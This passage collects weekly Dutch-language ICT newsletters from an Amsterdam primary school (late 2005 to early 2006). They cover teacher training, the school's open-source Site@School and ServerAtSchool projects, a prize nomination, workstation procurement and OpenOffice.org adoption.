Het gez... houdt niet op. We kregen weer brieven over de migratie naar een ander mailplatform. De brieven waren van 14 en 18 oktober. In die twee brieven kregen we voor een zelfde site een verschillend wachtwoord. Tja, welke is dan de goede? De mail deed het niet meer. De hele maandagochtend bezig geweest uit te vinden met de helpdesk waarom niet. Uiteindelijk bleek, dat onze beheerder iets aan de firewall moest doen. Maar uit de brieven was dat niet op te maken. Er stond: “wij adviseren u gebruik te maken van de DNS-servers xxxx en yyyy en van de mailhost zzzz.“. Er stond niet: “U moet iets aan uw instellingen veranderen, anders werkt uw mail niet vanaf die en die datum”. Enfin, alles werkt nu weer, maar het duurde onnodig lang om uit te vinden hoe het zit.

TOETSENBORD VALT

Van de week holde een kind langs een tafeltje. Het toetsenbord viel op de grond en er spatten een stuk of acht toetsen over de vloer. De kinderen schrokken zich dood. We mopperden niet, maar gaven de opdracht: zet de toetsen maar weer goed terug. Dat bleek een leuke puzzel. Ze hadden het bijna goed. Alleen de Tab en Ctrl toets zaten verkeerd om en het toetsenbord doet het nog prima.

ICT CURSUS TEAM

Deze week ging weer een groepje leerkrachten de computerkennis opfrissen/ Deze keer kwam de digitale fotocamera flink aan bod. Daarna konden we kiezen welk ICT onderdeel we wilden oefenen. Er is veel belangstelling voor het invoegen van plaatje/foto’s in een document. Iedereen is heel enthousiast, omdat je in eigen tempo en op eigen niveau iets kan leren. Kijk hoe ijverig!!

CURSUS ONDERBOUW

Deze maand gaan we met de onderbouw aan de slag om de ICT leerlijn te vervolmaken. Samen met de begeleider van het ABC zijn we de eerst bijeenkomt aan het voorbereiden. We lichten een tipje van de sluier op: er is een hele leuke website met heel veel verschillende kleuterspelletjes. Die spelletjes worden regelmatig aangepast. Kijk hier.

TAFELTOTAAL

Tot onze schrik hadden we dit schooljaar de leerlingen nog niet verplaatst naar een hogere groep in het programma TafelTotaal. Dat is nu gebeurd, dus iedereen kan de kinderen weer lekker laten oefenen.

COMMUNITIES

De Digitale Basisschool heeft in samenwerking met Kennisnet verschiilende \"communities\". In zo'n community deel je kennis over je groep. Je kunt lesstof uitwisselen en vragen aan elkaar stellen, ideeën opdoen. Neem eens een kijkje: www.digischool.nl (klik op docenten)

SINTERKLAAS

Volgende week wat leuke links.

KENNISROTONDE

Er zijn vorderingen met onze voorstellen voor de kennisrotonde. Binnekort hebben we er weer een bespreking over. Hartstikke spannend. Lees meer: Lees meer.

SERVERATSCHOOL

S#S logo

We zijn weer een stapje verder met de afwerking. Barry heeft een schitterend logo ontworpen. Vervolgens heeft hij het geschikt gemaakt voor gebruik op de SAS scholen. Als je op school een werkstation opstart, komt eerst het logo voorbij. Daarmee kunnen we afscheid nemen van het oude ascii art logo. Mooi (en goed) werk Barry! Tara zag in het hekje '#' een 'A' met uitstulpingen. Dat is het precies!

Documentatie

We vorderen. Het moment nadert dat we jullie een sneak preview kunnen aanbieden.

STRICT

De gebruikersvereniging van scholen die SAS gebruiken is weer een stapje verder. De ontwerp-statuten zijn door de 'founding fathers and mothers' goedgekeurd. De volgende stap is richting notaris.

Site@School

Cascading Style Sheets

Er wordt druk gediscussieerd in het forum over de voor- en nadelen van CSS in S@S. Moeten we er aan beginnen of niet? De meningen zijn verdeeld.

Prettig Weekend.
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-11-11 w45

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 45 - 2005 (11 november)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

AFSPRAKEN KLASSENCONSULTEN

Met de leerkrachten van de groepen 6, 7 en 8 zijn afspraken gemaakt met de medewerker van de onderwijsbegeleidingsdienst om presentaties te komen bekijken in de klas. Een presentatie kan een spreekbeurt of een werkstuk of een andere publicatie zijn. Dit hoort thuis in de leerlijn voor het maken van een werkstuk: hoe maak je een tekst in je eigen woorden?

SCHOLINGEN

Volgende week twee ICT scholingen: dinsdag voor de onderbouw en donderdag voor de remediërende software “Leesladder”.

INLOG KLEUTERGROEPEN

Omdat we volgende week bij het vervolmaken van de ICT leerlijn bij de kleuters de vraag gaan stellen: “moeten kleuters zelf de computer kunnen aanzetten en kunnen inloggen?”, zijn er aanpassingen gedaan, zodat het ook voor kleuters een fluitje van een cent is om in te loggen Dat kan nu zonder wachtwoord. Dus met een druk op de [Enter] toets of met de muis naar de 'OK' knop. We raden aan: gebruik het toetsenbord. Makkelijker voor de kleuters en je leert ze betere gewoontes. Tevens hebben ze een nieuw image gekregen.

DOORSTUREN VAN EMAILS DOOR PROVIDER

Met ons nieuwe emailplatform werden de emails die naar ons ICT-emailadres werden gestuurd niet meer doorgestuurd naar de ICT coordinator privé. Na veel zoekwerk door verkeerde informatie van de helpdesk uiteindelijk gevonden hoe je het kunt instellen op de beheerderssite die we hebben bij Priority Telecom. Wat gaat er toch veel tijd verloren door onkundige helpdeskmedewerkers!!

UPC

We hadden weer een paar storinkjes; wegvallende internetverbinding.

BEAMER

Volgende week hopen we meer informatie te hebben over een geschikte beamer voor onze school.

SINTERKLAAS

Weer allerlei sites: school-t.v. sinterklaasjournaal school-t.v. ideeën kennisnet

DIVERSEN

Kijk eens naar de Pols nieuwsbrief.

Site@School

Karin en Dirk gaven een introductie workshop Site@School voor ouders en leerkrachten van de 'Sterrenwachters' in Loosdrecht en Hilversum. Workshop was bedoeld om toekomstige gebruikers te enthousiasmeren voor het systeem. Dat lukte. Kijk maar.

Importeren leerlingen

In de nieuwe 2.4 beta komt een langverwachte faciliteit: het importeren van leerlinggegevens. Daarmee kunnen bijvoorbeeld via EDEX bestanden massaal leerlingen worden aangemaakt. Dat is makkelijk! Fred maakt gebruik van code door Peter is ontwikkeld voor ServerAtSchool. Het tool can zowel CSV als FRL bestanden aan.

Compliment.

Uit de US of A bereikte ons het volgende bericht: (lees het forum)

Subject : One Year Anniversary
Message : I'm just checking in to say hello, and we here at The Christ School in Orlando, Florida, USA are celebrating the completion of our first year of S@S! With deepest thanks for Fred, Dirk, et al. Our website has become far more creative and far more consistent, and far "deeper" (with more pages). Our teachers love their ability to edit their own pages and add images, etc. And I love the fact that I now spend most of my webmaster time creating content instead of tweaking my HTML code.
Thanks again, and I look forward to our second (and third....) years of S@S here on our side of the Atlantic.
Kind regards,
Rich

Waarop wij terugschreven:

Hello Rich,
Thank you for all the kind compliments. We are very happy with your school as Site@School user. Reasons:
- Your school's pupils contributed to S@S by proofreading the manual and finding hundreds of typo's. This is very much in the spirit of Site@School. S@S is also an educational project in itself. It gave pupils the opportunity to do real work.
- Your school paid for its support, thus contributing to the sustainability of S@S as a project and to the notion that OSS/GPL software also has its costs.
Let's go for another year!
Kind regards from us here,
The S@S development team.

SERVERATSCHOOL

Documentatie
Nog één hoofdstuk en we hoeven alleen nog maar de documentatie van de eindgebruikers te doen

Mail doorsturen

Met een paar kleine aanpassingen in ServerAtSchool kunnen we nu mail doorsturen. Scheelt in het checken van allerlei mailboxen.

Groet en goed weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-11-18 w46

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 46 - 2005 (18 november)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

POWERPOINT CURSUS VAN 21 NOVEMBER gaat niet door. Wordt verzet.

SCHOLING ONDERBOUW (KLEUTERS)

Deze week gingen we kijken of er een opvolging voor Letterpret is. We bekeken de nieuwe “Schatkist met de muis”. Ook bij deze versie van schatkist werd er geïrriteerd gereageerd op de stem in het programma. Er is een volwassene die met een kinderstem praat. De reactie van de collega’s was: “waarom praten ze niet gewoon tegen de kinderen?” Ook het niveau in de lijn van ontluikende geletterdheid vonden ze veel te hoog. Niet enthousiast dus.
Wel werden ze enthousiast bij het voorbeeld wat je kunt doen met foto’s die je met de digitale camera neemt in de klas. In een simpele PowerPoint presentatie kan er een handzaam leermiddel worden gemaakt dat direct aansluit bij het thema dat aan de orde is
Voor de goede orde bij de lezers: er wordt bij ons op school gewerkt met “startblokken” Lees meer over Startblokken.
Verder werd afgesproken, dat bekeken wordt met de leerlingen hoe de spelletjes van Z@ppflat bevallen.

ALGEHELE SCHOLINGSDOORLICHTING

Karin en Jan hebben alle onderdelen van de ICT scholingen en begeleiding en klassenconsulten en software scholingen nagelopen en een doe-lijst opgesteld. Karin gaat daarmee aan de slag. Probleem dat telkens opduikt: de scholingen over de remediërende software zijn moeilijk te organiseren op een dag dat zoveel mogelijk mensen werken. De scholing van leesladder ging deze week niet door.De directie heeft al voorgesteld er onder schooltijd tijd voor vrij te maken. Maar als je alles bij elkaar optelt wordt dat wel een hele studiedag. Want voor het goed gebruiken van het programma Maatwerk moeten we ook nog geschoold worden.

TECHNIKA 10

In januari zal het aanbod NaSchoolseActiviteiten worden uitgebreid met het onderdeel “computers voor meisjes”. Meisjes uit groep 5 en 6 zullen dan10 weken allerlei ICT kneepjes leren die ze ook thuis -als er een computer is- kunnen toepassen. Het onderdeel “je eigen web site maken” zal eruit bestaan dat ze in HTML code dat leren. Gelukkig is dat ook toepasbaar in een leerling-pagina op de site van de Rosa Boekdrukker. Er kunnen 12 meisjes meedoen. Daarom gaan we nu haast maken met het creëren van extra computerplekken op de bovenste verdieping

TREMA

Van de week kwam een leerling uit een bovenbouwgroep aan ons vragen hoe een trema op de e moet worden geplaatst. Zo’n vraag zou een kind ook aan een medeleerling kunnen stellen.

LICENTIES

Deze week kwamen de licenties binnen voor Windows en Word. Zodat we het APS in 2006 niet meer nodig hebben.

KENNISROTONDE

Deze week hebben we opnieuw de vraag geformuleerd voor de kennisrotonde bij de Stichting ICTopSchool. Het gaat nu ongeveer zo luiden: “wat moet er allemaal gebeuren om leerlingen hun teksten te laten publiceren op een website?” Als de vraag wordt gehonoreerd, krijgen we geld om onderzoek te doen.

PRIJSUITREIKING

Dinsdag 22 november gaan we naar Utrecht voor de Kennisdeler prijs. We hopen op een eerste prijs. De uitreiking vindt plaats tijden het congres “Leren vernieuwen met ICT”.

ROOTKIT

Jullie hebben vast gehoord van de 5 miljoen Sony CD's die een rootkit bevatten waardoor crackers nog makkelijker toegang krijgen tot je computer.
Een rootkit is een verzameling gereedschappen die een computer inbreker via een achterdeur toegang verschaft tot een systeem, daar data te verzamelen van andere systemen in het netwerk en te maskeren dat het systeem besmet is.
Karin: Een rootkit is een tool dat witte pieten gebruiken.

OpenOffice.org

OpenOfffice.org is een compleet gratis office pakket. Het werkt hetzelfde als Microsoft Office 2003 en schijnt er ook geheel hetzelfde uit te zien. Wereldwijd in gebruik als vervanger van MS Office. Veel Nederlandse gemeenten werken er ook mee.
De Nederlandse versie 2.0 is beschikbaar! Weliswaar zijn nog niet alle helpbestanden volledig vertaald, maar er is verder prima mee te werken. Probeer 'm en gebruikons gemeenschapsgeld nog beter! Hier downloaden en kies het bestand:
OOo_2.0.0rc3_051014_Win32Intel_install_nl.exe

Groet en goed weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-11-25 w47

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 47 - 2005 (25 november)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

CONGRES ICT EN LEREN

In Utrecht vond voorafgaand aan ondergenoemde Kennisdelerprijs een congres plaats over ICT en Leren.. ’s Ochtends waren er twee plenaire bijeenkomsten. Tussen de middag een lunch met allerlei stands van ICT activiteiten. Je kon bij veel stands zien wat andere scholen opgezet hebben op ICT gebied.’s Middags waren er drie worshop-rondes. Het was beslist de moeite waard, maar er blijft toch altijd een kloof bestaan tussen allerlei leuke ideeën en het enthousiasmeren van je eigen team.

KENNIS-DELER PRIJS 2005

Onze school, de Rosa Boekdrukker, was één van de drie genomineerden voor de Kennisdeler 2005 prijs van Stichting ICT op School.
Gevieren (Fred, Peter, Karin en Dirk) waren we uitgenodigd voor de uitreiking. Twee personen per genomineerde mochten op het podium staan. Goed Gejat 2005 prijs werd gelijktijdig uitgereikt en had ook 3 genomineerden. Zo stonden wij met 12 mensen op het podium!
De zenuwen gierden ons door de keel. Trillend als espenbladen wachtten wij het eindoordeel van de jury af... (zie foto's)
Helaas.
Winnaar werd het Op Maat Platform, een samenwerkingsverband tussen 6 mytyl/tytylscholen en ICT&E, ondersteund door Kennisnet.
Vanuit het standpunt van de jury (waarin ook scholieren waren vertegenwoordigd) was de keuze terecht.
Wat wij delen (Site@School, ServerAtSchool, gebruikersvereniging STRICT, ICT leerlijn) is niet flitsend en niet direct op leerlingen gericht.
Erger dan het niet krijgen van de prijs, was dat we ons verhaal onvoorgedragen bleef. Een klein stukje willen we jullie daaruit niet onthouden:

[knip inleiding]
Wij delen kennis, inderdaad. Maar nog veel meer mensen delen hun kennis met ons. Daarover willen we hier iets kwijt en we willen ook enkele woorden richten tot de Stichting ICT op school zelf. Eerst over het delen van kennis. Dat doen we al jaren met onze wekelijkse ICT nieuwsbrief. Iedere week delen we de ICT vreugden en smarten van onze werkvloer.
[knip verhaal over hoe bij S#S en SAS kennis wordt gedeeld]
Door het ontwikkelen van Site@School en ServerAtSchool krijg je nogal wat kennis over educatieve software. Laten we zeggen "er is goede en er is 'minder goede software' ".
Je krijgt kennis over aanbieders van ICT diensten en netwerken. Laten we zeggen "er zijn 'minder goede' maar toch ook 'goede'".
Je krijgt kennis over hoe aanbieders omgaan met basisscholen. Laten we zeggen: je hebt basisscholen die daar niet tegen opgewassen zijn en je hebt basisscholen die daar _helemaal_ niet tegen opgewassen zijn.
Hierna hadden we nog een paar ideeën voor de Stiching ICT op School.

Tot zover het verhaal dat niet doorging.

Vervolgens was er een receptie waar we nog wat bekenden tegenkwamen. Gelukkig was er gratis drank voor de verliezers. Dat was wel nodig. :-)
Gelukkig vond het team, dat we wel een troostprijs verdiend hadden (zie foto)

Goed weekend,
Karin Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-12-02 w48

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 48 - 2005 (2 december)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

SINT

Deze week is de BIC op rijm en kort,
want over ICT werd weinig gemord
Vreugde viel er ook niet te beleven
Wat heeft de week dan aan nieuws gegeven?
"Lees en huiver" schrijven wij vaak.
Op ICT gebied is het niet altijd raak.
Nu echter ruim baan voor het kleine leed
dat ICT  deze week de gebruikers aandeed

BEELDSCHERM

Gerda stuurt geen storingformulier,
maar meldt zich op het ICT hoofdkwartier.
"Mijn beeld zit vol met vreemde vlekken!".
Monitormazelen? ICTschurftplekken?
Wij wisten, gelukkig uit ervaring,
voor het verschijnsel een verklaring.
Geen monitorzweer of beelschermkrentenbaard,
maar een langzaam bezwijkende videokaart
Fluks deden wij de computerwisseltruc.
Gerda's vreugd kon niet meer stuk.

PRINTERLEED

Maarten meldde storing aan printer
Naarstig zoeken.... Dirk vind er
eentje die ons voor raadsels stelt:
CUPS was wederom geveld.
Dat is geen BH voor papier of afdrukplaat,
maar de server die met alle printers praat.
De oorzaak blijft voorlopig een mysterie
en drijft ons af en toe tot hysterie.

SERVERATSCHOOL

De documentatie is bijna helemaal af,
maar de laatste loodjes zijn welhaast een straf
Tot Peters ongenoegen moet hij kennis nemen
van domme, of geheime Windows genen
Voor hem, die altijd alles weten wil,
is Window een een breinafstompend paskwil.
Hij weet het OS in vorm te slijpen.
Nu danst het redelijk naar zijn pijpen.
"Safe kan Windows nooit worden" bromde hij.
"Alleen 'nixen's veiligheid maakt mij blij".

Site@School

Vreugde aan het Site@School front
vanwege de bug die Fred vond.
's Beestje's leven eindigde tragisch
via een commando; automagisch.
Sint treurt over zoveel dierenleed
bij een vernietinging, zo compleet.
Bug's laatste rustplaats is /dev/null
Genoeg nu van deze rijmflauwekul!

De afdeling wenst u een Sint zonder kater of hik.
Volgende week gelukkig weer een gewone BIC.
Sint en Piet

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-12-09 w49

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 49 - 2005 (9 december)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

STAND VAN ZAKEN ICT LEERLIJN.
HEBBEN DE GROEPEN DE OPDRACHTEN GEDAAN?

Dat kwam in een bouwvergadering aan de orde. Nog steeds is een struikelpunt: hoe/wanneer leer je kinderen een nieuwe techniek aan op de computer? Hoe organiseer je dat? Het oefenen met de aanwezige software levert over het algemeen geen problemen op.

UPC en XS4ALL

Deze week lag de kabel van UPC er weer een paar keer uit. We worden het zat. We gaan over op het scholenaanbod van XS4ALL. Alsof meneer UPC het hoorde; ze belden meteen en zeiden dat de verbinding naar ons slecht was en of ze konden komen meten. Helaas, te laat... Ze zouden vandaag (vrijdag 9 december) komen, maar we hebben hen nog niet gezien. (16.20 uur)

ESIS

Volgende week zal Karin met telefoon handsfree -ondersteund op afstand door Peter- het exportprogramma van de leerlinggegevens exporteren naar het Monitorbedrijf. Dat programma haalt de gegevens van het schooljaar 2004-2005 op. We wachten het vol spanning af, want het email programma Outlook zal vanzelf openen. We zijn benieuwd....

FOTOGRAFIE

Bij ons op school is fotograferen erg in trek. Het wordt nu hoog tijd om meer mensen op te leiden om de foto’s op de website te zetten. Helaas zitten er nog wat rommeligheden in ons foto-album. Dat moet eerst opgeruimd worden.

TOETSENBORD.

Van de week troffen we (5 december surprise???) op onze werkplek een toetsenbord aan in een plastic verpakking. Joepie, dachten wij, een toetsenbord. Groot was onze teleurstelling, dat na het uitpakken het geen draadloos toetsenbord was, maar een toetsenbord waar de draad van afgeknipt was. Welke Piet heeft ons die poets gebakken? En waar blijft dan het echte kado?

NIEUWE COMPUTERS

De kogel is door de kerk, we gaan over op nieuwe werkstations. We hebben bij drie leveranciers een offerte gevraagd. Dat deden we zo:

Geachte mevrouw, mijnheer,
Wij zijn in de markt voor 70 (zeventig) werkstations. Wij denken aan tweedehands systemen. Ze moeten identiek zijn; dit in verband met het probleemloos werken na het terugzetten van disk images. Zie ook opmerking onder. Onderstaand onze eisen en wensen:

EISEN AAN WERKSTATIONS:

- Intel CPU, minimaal 1 GHz
- 256 MB RAM minimaal
- IDE-disk 4 GB minimaal
- Netwerk: 10/100 Mbps met PXE; het systeem _moet_ kunnen booten met PXE
- Video: 1024 x 768 x 16 minimaal
- Floppy: optioneel
- CD-ROM: optioneel (*)
- USB: versie 1.1 minimaal
- Drivers voor Windows 98 SE beschikbaar
- Geruisloze voeding + koeling (ivm gebruik _in_ de klaslokalen)
- Desktop i.v.m. ruimtegebrek.

(*) Voor het gros van de machines is een CD-ROM speler NIET nodig, maar er moet er minimaal 1 zijn die WEL een CD-ROM speler heeft opdat er software geïnstalleerd kan worden.

Van belang is dat alle werkstations _identiek_ zijn. Dat betekent:
- hetzelfde moederbord
- dezelfde chipset (en versienummer)
- dezelfde BIOS (en versienummer)
- identieke uitbreidingskaarten (en versienummer)
- uitbreidingskaarten telkens op dezelfde plaats

AANVULLENDE WENSEN WERKSTATIONS

- De CPU mag meer MHz hebben
- Meer geheugen dan 256 MB mag
- Een grotere disk dan 4G mag, zolang de BIOS er geen problemen mee heeft (bekende moeilijke grenzen zijn: 33.8 GB en 137 GB; 20G of 30G zijn veilige keuzes)
- Audio: 3,5mm hoofdtelefoonaansluiting aan voorzijde kast
- USB: aansluitingen aan de voorzijde
- De USB mag versie 2.0 zijn mits er drivers meegeleverd worden.
- Een ingebouwde luidspreker (mono of stereo) die uitgeschakeld wordt als een hoofdtelefoon wordt aangesloten
- Kleine kast (ivm ruimtegebrek _in de klas_)
- Geen ingebouwd (win)modem of in ieder geval uitschakelbaar

Tot zover onze eisen en wensen.
Wat zou u voor ons kunnen betekenen?
Met vriendelijke groet,
etc.

-------------------------------------------------------

Wellicht bevat bovenstaande mail een paar aandachtspuntjes waar jullie iets aan hebben voor als je zelf weer moet inkopen.

Tot nu toe horen we dat eigenlijk alle P4 werkstations USB en entrees voor geluid aan de voorkant hebben.

We hopen voor dik onder de 200 Euro per werkstation uit te komen.

Binnen afzienbare tijd komen onze P2 , 400 MHz, 128 Mb RAM, 4 Gig HD werkstations vrij. Belangstelling?

SERVERATSCHOOL

We vorderen...

SITEATSCHOOL

De derde beta versie van Site AtSchoolS is vandaag uit. LET OP: Met EDEX ondersteuning! Zo kun je met een leerlingenbestand uit bijvoorbeeld ESIS of LAR etc. alle leerlingen in één keer invoeren.Een absolute kraker! Dit dankzij een gemeenschappelijk gebruik van de code van ServerAtschool in  SiteAtSchool. Ook als je andere bestandsformaten gebruikt kun je massaal leerlingen invoeren.
Verder zitten het langverwachte multiple file upload programma en de nieuwe fck editor er in. Met het file upload programma kun je in één keer al je foto's op de site zetten. De nieuwe fck editor is de opvolger van de HTMLarea editor; een project dat helaas niet meer bestaat. In de nieuwe editor zit een feature waarmee je Word documenten kunt opschonen zodat ze netjes op je site komen.
Je kunt de nieuwe beta uploaden via het forum: Let op: dit is beta software. Eerst testen en eventuele bug melden op het forum. De nieuwe versie komt in mei 2006 uit.

Dat was het weer. Groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-12-13 w50

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 50 - 2005 (16 december)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

POWERPOINT

Maandag hebben we na schooltijd de eerste powerpoint cursus. Binnenkort dus veel te zien. De beamer hebben we nog niet.

EXPORTPROGRAMMA

Afgelopen maandag ging Karin met de koptelefoon onder begeleiding van Peter het exportprogramma uitvoeren.
De ESIS gegevens moesten worden opgestuurd naar het “monitorbedrijf”. Na wat opstartproblemen kon Karin het wel alleen. Maar... naar 53% van het verzamelen van de gegevens liep het programma vast. Dat verzamelen had al dik een half uur geduurd. Op een tweede computer gebeurde hetzelfde.(weer een dik half uur) Dus bellen met de helpdesk. Er zou worden teruggebeld. Dat gebeurde een paar uur later. Na het aanhoren van de problemen werd gevraagd: “met welke versie van WINDOWS werkt u?” – “Met windows 98.”. Ja dat is een bekend probleem. We werken eraan.
Een paar uur later kwam er een mailtje: Of de back-up opsturen per email, of met het meegezonden file-tje de .ini aanpassen. op de C-schijf.
Daarop hebben we een mail gecomponeerd met de volgende strekking: “u laat ons modderen in kostbare tijd, terwijl u weet dat het niet werkt, dus kom de gegevens hier zelf halen”
Nog geen antwoord ontvangen; maar woest waren we wel.

TAFEL TOTAAL

Groep 4 is begonnen met het oefenen van de tafels op de computer (kijk maar). Ze zijn reuze enthousiast. Zo zie je hoe een computerprogramma een meerwaarde heeft in het onderwijs.

SPELLING

Als je bij het nieuwe groene boekje het pakket neemt, zit er een cd-rom bij. Wij bekijken hoe die op de server moet worden geïnstalleerd en of de spellingcontrole in ons tekstverwerkingsprogramma de nieuwe spelling van de cd meeneemt. Intussen gelezen in de handleiding, dat het groene boekje niet werkt op windows98. Jammer.

KERSTMIS in de ICT

Voor de NSA computer cursus “technika 10” in januari zetten we nog 6 computers in op de tweede verdieping. Zo staan er 12 en heb je een computerklasje. Helaas kunnen we ze nog niet aansluiten omdat alle stekkerdozen in gebruik zijn door kerstbomen.

OFFERTES

BIC lezer Rien stuurde ons een adres van een bedrijf in Rotterdam dat ook in tweedehands c.'s voor scholen doet.
Zeer bedankt Rien! Dat kwam precies goed uit omdat een bedrijf had afgehaakt. We waren blijkbaar te bot toen we zeiden dat we alleen van de informatie m.b.t. de offerte uitgaan en geen extra info geven.
Het bedrijf dat de Rien aanraadde belde ook en had ook vragen, maar geen moeite met dezelfde aanpak. Ze vroegen: Wat is PXE? We zeiden dat ze dat zelf moesten uitzoeken omdat de offerte nog aan twee andere bedrijven was gestuurd en we niemand wilden voor- of achterstellen. Deze man: “OK, ik vraag wel even aan mijn collega”. We wachten af.
De eerste twee offertes zijn binnen.

OPENOFFICE.ORG

De gemeente Haarlem gaat ook over op Ooo en heeft prima handleidingen gemaakt en, net zo belangrijk, een gebruiksaanwijzing over hoe je OOo moet configureren zodanig dat 't net zo werkt als MSO. De handleidingen zijn voor een luttel bedrag te koop. De gebruiksaanwijzing voor de configuratie is gratis en mag vrij verspreid worden.
Als je de gebruiksaanwijzingen koopt, moet je verklaren ze niet te verspreiden. Dit om allerlei bureautjes, die goed verdienen aan tekstverwerkingscursussen, niet de kans te geven gratis met het materiaal aan de haal te gaan.

We zeggen deze week maar eens niks over S@S en SAS. Het gaat weer goed.

groeten en prettig weekend
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-12-23 w51

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 51 - 2005 (23 december)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Deze week weinig BIC, want er was veel Kerst en Karin moest voor de klas wegens zieke collega. Dirk was, tezamen met Peter, druk met nieuwe klanten voor ServerAtSchool, zie ook onder.

POWERPOINT

Afgelopen maandag hebben we met 7 collega's de eerste cursus Powerpoint gehad, hier op school. Na uitleg maakten we allemaal een presentatie van 4 dias. Het werkt erg inspirerend om met een groepje iets nieuws te leren. Iedereen was enthousiast en iedereen kon het ook. Volgende cursus is 16 januari 2006. Dus binnenkort zullen er spetterende presentaties plaatsvinden op de Rosa Boekdrukker.

ICT BEGELEIDING BOVENBOUW

Er zijn problemen in de bovenbouw met de uitwerking van de ICT leerlijn. We hebben deze week een gesprek gehad met het ABC (onderwijsbegeleidingsdienst) en zullen in januari beslissen of we met deze bouw wel of niet zullen doorgaan met begeleiding vanuit het ABC.

STRICT i.o.

'STRICT' is de naam van de gebruikersvereniging van scholen die ServerAtSchool gebruiken (http://serveropschool.nl) . 'STRICT' staat voor 'Scholen Tezamen rijk met ICT'.
Welnu, STRICT was op zoek naar een notaris en lijkt die gevonden te hebben. Het had enige voeten in de aarde om een notaris te vinden die Open Source in zijn vakgebied heeft, maar enig zoeken leverde op dat ze gewoon bestaan. We hopen dat de gebruikersvereniging binnenkort een feit is.

OFFERTES

We hebben drie offertes binnen. Dirk zal ze in de kerstvakantie naast elkaar leggen en de offertes in één overzicht onderbrengen. Na de vakantie maken we een keuze met wie we verder gaan; d.w.z. nader onderhandelen.

OPENOFFICE.ORG

We hebben een overeenkomst met de Gemeente Haarlem gesloten tot levering van OOo handleidingen. Voor Euro 3,-- per werkstation krijgen we een complete set. Die bestaat uit:

1. Handleiding O.O.o, Presentatie basis
2. Handleiding O.O.o, standaardbrieven
3. Handleiding O.O.o, Werkbladdocument Basis
4. Handleiding O.O.o, Gevorderden
5. Handleiding O.O.o, Writer basis
6. Handleiding O.O.o, Writer Gevorderden(1)
7. Handleiding O.O.o, Writer Gevorderden(2)

De prijs van E 3,-- voor de hele set is de prijs voor het onderwijs. Wij vinden het onvoorstelbaar goedkoop. Dit project verdient meer dan onze volle steun, nl. ook die van jullie.

Met OOo heb je een gratis office pakket in huis dat net zo werkt als Microsoft Office. En als alle ambtenaren van een gemeente er mee kunnen werken, dan zou dat onderwijzers en kinderen toch ook moeten lukken.... Wie nu nog klaagt over dure Office pakketten heeft ons inziens een uitstekend gratis alternatief.

En wie niet klaagt maar Microsoft Office in de school heeft en jaarlijks aan APS IT diensten betaalt, gebruikt gemeenschapsgeld verkeerd.

Beleefd aanbevelend,
een prettige Kerst en een voorspoedig 2006
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-01-10 w02

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 2 - 2006 (13 januari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Reply project

Afgelopen maandag was er een voorlichtingsbijeenkomst voor het "Reply Project". Elke week maken de leerlingen van onze groep 5 een stelopdracht die ze emailen naar de reactie bij STAMPEI.
Na 4 weken worden twee kinderen uitgenodigd om van de ingeleverde bijdragen een klassenkrant te komen maken.
Volgende week meer over de opdrachten en wanneer ze beginnen.

GROOT NIEUWS

Na grondige vergelijking van de drie offertes voor nieuwe computers hebben we een keuze gemaakt. We hebben 70 nieuwe computers besteld. Ze zijn niet helemaal nieuw, maar wel veel krachtiger dan die we nu hebben. Ze hebben een processor van 1,7 Mhz (Intel Pentium) en een intern geheugen van 256 RAM. Ze zijn klein en stil en hebben aan de voorkant de aansluiting voor geluid en usb. We kochten ze bij ArcomIT, prima zaak, waar we vaker zaken mee gedaan hebben.
Nu moeten we nog een planning maken: hoe laten we de omhuizing van al die computers verlopen? Er breken dus drukke tijden aan.

ONGEMAK VERHOLPEN?

Bij een computer in groep 3 bleef de aan/uit knop steeds ingedrukt. Dat is natuurlijk moeilijk uitzetten. Dirk heeft het frontje er even afgehaald, het drukschakelaartje losgepeuterd en even door de kieren heen naar buiten gehangen. Jammer genoeg komt die klas niet in aanmerking voor een nieuwe computer, omdat het programma Veilig Leren Lezen (oude versie) daarop draai. Dus deze oplossing is maar tijdelijk.

COMPUTERTAFEL

